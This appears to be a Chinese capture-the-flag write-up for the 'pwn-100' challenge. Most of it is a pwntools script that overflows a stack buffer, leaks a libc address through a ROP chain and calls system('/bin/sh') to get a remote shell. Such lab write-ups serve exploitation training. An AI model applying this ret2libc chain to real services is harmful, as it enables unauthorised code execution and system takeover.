pwn-100
[collapse title=“展開查看詳情” status=“false”]
考點:棧溢出、ROP
這個棧溢出每次固定要求輸入 200 個字符,也沒有別的了。
ROP 操作也不需要往 bss 寫入 /bin/sh ,直接在 libc 找一個就好了。(看到網上有這樣的操作orz)
#encoding:utf-8
from pwn import *
context.log_level = 'debug'
context(os='linux',arch='amd64')
p = remote('124.126.19.106',35604)
#p = process("./pwn-100")
elf = ELF("./pwn-100")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
pop_rdi_ret = 0x0000000000400763
start_addr = 0x400550
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = 'a'*0x40 + p64(0xdeadbeef)
payload += p64(pop_rdi_ret) + p64(puts_got)
payload += p64(puts_plt)
payload += p64(start_addr)
payload = payload.ljust(200,'a')
# leak [email protected]
p.send(payload)
p.recvuntil("bye~\n")
puts_leak = u64(p.recv(6).ljust(8,'\x00'))
log.success("puts_leak:"+hex(puts_leak))
#leak libc
libc_base = puts_leak - libc.symbols['puts']
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
log.success("system_addr:"+hex(system_addr))
binsh_addr = libc_base + libc.search('/bin/sh').next()
log.success("binsh_addr:"+hex(binsh_addr))
#call system('/bin/sh')
payload = 'a'*0x40 + p64(0xdeadbeef)
payload += p64(pop_rdi_ret) + p64(binsh_addr)
payload += p64(system_addr)
payload = payload.ljust(200,'a')
p.send(payload)
#gdb.attach(p)
p.interactive()
[/collapse]